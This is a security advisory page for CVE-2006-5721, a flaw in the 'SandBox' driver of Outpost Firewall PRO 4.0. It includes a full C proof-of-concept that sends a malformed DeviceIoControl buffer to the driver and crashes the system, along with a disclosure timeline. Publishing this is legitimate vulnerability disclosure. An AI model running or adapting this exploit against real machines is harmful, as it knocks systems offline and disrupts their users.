Security News -  Security Reviews -   Exploits -  Tools -  UNIX Focus -  Windows Focus
SecuriTeam™  Beyond Security®  SecuriTeam™ Home  Ask the Team  Mailing Lists  Advertising Info  Blogs SecuriTeam™ in Your Inbox   E-mail this CVE-2006-5721 to a friend New vulnerability? New tool? Tell us	CVE-2006-5721 Outpost Insufficient Validation of 'SandBox' Driver Input Buffer     Credit: The information has been provided by Matousec - Transparent security Research. The original article can be found at: http://www.matousec.com/info/advisories/Outpost-Insufficient-validation-of-SandBox-driver-input-buffer.php Website Security Scan Code Vulnerability Test Network Assessment Tool Detect hidden vulnerabilities Exhaustive automated testing Real-time, continuous security Get guidance from professionals of internal or 3rd party code. scanning for your entire network    CVE-2006-5721 Details Check for CVE-2006-5721 Vulnerability Assessment and Management. Automated Pen Testing for 50 to 50,000 nodes beyondsecurity.com/vulnerability-scanner Vulnerable Systems:  * Outpost Firewall PRO 4.0 (964.582.059) CVE Information: CVE-2006-5721 Proof of Concept Code: /*  Testing program for Insufficient validation of "SandBox" driver input buffer (BTP00001P004AO)  Usage:  prog    (the program is executed without special arguments)  Description:  This program uses standard Windows API CreateFile to open "SandBox" driver and using DeviceIoControl it sends  malicious buffer to the driver that crashs the system.  Test:  Running the testing program. */ #include <stdio.h> #include <windows.h> void about(void) {   printf("Testing program for Insufficient validation of \"SandBox\" driver input buffer (BTP00001P004AO)\n");   printf("Windows Personal Firewall analysis project\n");   printf("Copyright 2006 by Matousec - Transparent security\n");   printf("http://www.matousec.com/\n\n");   return; } void usage(void) {   printf("Usage: test\n"          " (the program is executed without special arguments)\n");   return; } void print_last_error() {   LPTSTR buf;   DWORD code=GetLastError();   if (FormatMessage(FORMAT_MESSAGE_ALLOCATE_BUFFER | FORMAT_MESSAGE_FROM_SYSTEM,NULL,code,0,(LPTSTR)&buf,0,NULL))   {     fprintf(stderr,"Error code: %d\n",code);     fprintf(stderr,"Error message: %s",buf);     LocalFree(buf);   } else fprintf(stderr,"Unable to format error message for code %d.\n",code);   return; } int main(int argc,char **argv) {   about();   if (argc!=1)   {     usage();     return 1;   }   HANDLE file=CreateFile("\\\\.\\Global\\SandBox",GENERIC_READ | GENERIC_WRITE,FILE_SHARE_READ | FILE_SHARE_WRITE,                          NULL,OPEN_EXISTING,0,NULL);   if (file!=INVALID_HANDLE_VALUE)   {     char buffer_in[32];     char buffer_out[32];     memset(buffer_in,2,sizeof(buffer_in));     DWORD retlen;     DeviceIoControl(file,0x80000058,buffer_in,sizeof(buffer_in),buffer_out,sizeof(buffer_out),&retlen,NULL);   } else   {     fprintf(stderr,"Unable to open SandBox driver.\n");     print_last_error();   }   printf("\nTEST FAILED!\n");   return 1; } The original proof of concept code can be downloaded from: http://www.matousec.com/downloads/windows-personal-firewall-analysis/BTP00001P004AO.zip Disclosure Timeline: 2006-11-03: Vulnerability confirmed by the vendor 2006-11-03: Candidate for inclusion in the CVE list 2006-11-02: Vulnerability confirmed by popular information sources 2006-11-01: Advisory released 2006-11-01: Vendor notification  Comments on CVE-2006-5721:  Add new comment:  Subject:  Name/Nick/Email:          Chars Left:	All Sections Security News Unix focus Exploits Tools Windows focus Security Reviews
	Security News - Security Reviews - Exploits - Tools - UNIX Focus - Windows Focus

Copyright © 1998-2010 Beyond Security® All rights reserved.
Terms of Use Site Privacy Statement.
SecuriTeam™ is a trademark of Beyond Security®